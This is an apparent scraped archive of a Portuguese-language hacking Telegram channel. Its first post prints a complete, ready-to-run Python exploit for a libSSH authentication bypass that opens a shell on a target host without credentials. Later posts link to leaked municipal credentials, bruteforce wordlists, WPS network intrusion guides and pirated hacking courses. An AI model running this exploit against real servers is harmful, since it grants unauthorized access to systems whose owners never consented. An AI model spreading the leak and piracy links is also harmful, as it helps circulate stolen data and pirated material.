Ruby Of Security
Відкрити в Telegram
Here you will find content like: 🌎 Notícias | 📡 Tecnologia | 🌐Hacking 📚 Cursos | ⚒Ferramentas | 📝Tutoriais @DARKNET_BR @TIdaDepressaoOficial @ExploitHub @AcervoDoSam Acervo:@AcervoRubyOfSec Group:@RubyOfSecGroup © Ruby Of Security - 2014 - 2019
Показати більшеКраїна не вказанаКатегорія не вказана
1 341
Підписники
-124 години
Немає даних7 днів
+330 день
Архів дописів
1 341
libSSH Authentication Bypass
libSSH suffers from an authentication bypass vulnerability.
Bypass;
#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit
parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")
args = parser.parse_args()
def BypasslibSSHwithoutcredentials(hostname, port):
sock = socket.socket()
try:
sock.connect((str(hostname), int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
spawncmd = transport.open_session()
spawncmd.invoke_shell()
return 0
except paramiko.SSHException as e:
print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
return 1
except socket.error:
print("Unable to connect.")
return 1
def main():
paramiko.util.log_to_file(args.logfile)
try:
hostname = args.host
port = args.port
except:
parser.print_help()
exit(1)
BypasslibSSHwithoutcredentials(hostname, port)
if name == 'main':
exit(main())
fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html
1 341
Introdução ao uso do programa R : https://cran.r-project.org/doc/contrib/Landeiro-Introducao.pdf
1 341
Vazamento de Dados – Pardinho e PMMG – Lil_Sh4wtyy
Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na página da Polícia Militar de Minas Gerais (PM/MG). As ações foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting.
O vazamento do município de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuário/senha) em texto claro.
🌏@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/
1 341
Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File
Automatiza algum trabalho pentesting através de um arquivo XML nmap. Assim que cada comando termina, grava sua saída no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rápido primeiro. Por favor me envie protocolos / comandos / opções que você gostaria de ver incluídos.
🌏@RubyOfSec
https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html
1 341
Escaneando vulnerabilidades com nmap
Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter várias funções e a possibilidade de usar scripts NSE.
https://rubyofsec.wordpress.com/2018/10/12/escaneando-vulnerabilidades-com-nmap/
🌏@RubyOfSec
1 341
Identificando WAF/IDS/IPS Pelo Sqlmap
A grande maioria de amadores na segurança da informação cometem o erro de sairem rodando quaisquer ferramentas sobre uma aplicação web, e isso pode comprometer sua integridade e anonimato além de trazer contratempos indesejáveis na fase de condução de um Pentest, por isso deve-se utilizar meios para identificar as proteções que o alvo possui.
https://rubyofsec.wordpress.com/2018/10/10/identificando-waf-ids-ips-pelo-sqlmap/
🌏@RubyOfSec
1 341
Vazamento de Dados – São João da Boa Vista – Purpl3Pand4
Nosso sistema de Monitoramento Avançado Persistente identificou, em 10/10, nova publicação nos site de compartilhamento de texto Pastebin.com contendo vazamento de dados do município de São João da Boa Vista/SP.
A ação foi reivindicada pelo hacker brasileiro Purpl3Pan4. A motivação para o leak foi claramente político-ideológica, com explícita menção a #OpEleiçãoContraOFascismo convocada pelo AnonOpsBR.
🌏@RubyOfSec
https://www.defcon-lab.org/vazamento-de-dados-sao-joao-da-boa-vista-purpl3pand4/
1 341
Wordlists (ssh, rdp, etc)
Wordlists para realizar ataques de bruteforce em servicos como por exemplo: ssh, rdp, etc.
https://github.com/jeanphorn/wordlist
🌏@RubyOfSec
1 341
Parrot OS Security 4.2
https://drive.google.com/open?id=1z4ziPubVXChSy1tzxaQBNs49BUWlvPgy
🌏@RubyOfSec
1 341
Cursos Livres
Curso Bruno Fraga - Técnicas de invasão - https://mega.nz/#F!lkBmWKwC!HwJuqt9DrE7IRjkSKVdNHw!Q5BB1IIZ
Curso DESEC Pentest - https://mega.nz/#F!o2RF3L4I!zj1NdN0z-nRR0IH2gdCNVQ!07JT1AQS
Pentest profissional - Desec Security - https://mega.nz/#F!o2RF3L4I!zj1NdN0z-nRR0IH2gdCNVQ
Curso Etical hacking - Invasão de redes Wireless - https://drive.google.com/file/d/0B7DZdGrd5LrRYzZfaWMzU3YzNzQ/view
Ethical hacking: Exploits - https://mega.nz/#F!ADoA3ZpJ!eg6XYexec2wuGK2VY0rioA
Pacotão de cursos - https://mega.nz/#F!UV0BSZyB!FVXxK0Czcy3hMkLdckY2qg
Curso Solyd Pentest profissional - http://www.mediafire.com/file/ha1i1m4jxyvss09/solyd.torrent
🌏@RubyOfSec
1 341
Invasão em rede WPS
Como todos nós sabemos a rede WPA2 oferece um recurso que permite ao usuário se conectar a ela através de um PIN é aí que entra a vulnerabilidade, o Kali linux oferece uma infinidade de ferramentas dentre elas uma chamada Bully.
🌎@RubyOfSec
https://rubyofsec.wordpress.com/2018/10/10/invasao-em-rede-wps/
1 341
DoS - Denial of Service
DDoS - Distributed Denial of Service
DRDoS - Distributed Reflection Denial of Service
🌎@RubyOfSec
http://www.inf.ufsc.br/~bosco.sobral/ensino/ine5630/material-seg-redes/Cap11-DDoS.pdf
1 341
AnonSurf - Rede Tor
Anonimiza todo o sistema sob TOR usando IPtables. É muito fácil configurar e possivelmente menos complicações do que configurar uma VPN. É claro que você terá uma velocidade de conexão mais lenta que a VPN, já que está usando a rede TOR.
O Anonsurf funciona em segundo plano (você pode fechar o terminal) e altera o endereço IP automaticamente a cada poucos minutos.
🌎@RubyOfSec
https://github.com/ParrotSec/anonsurf
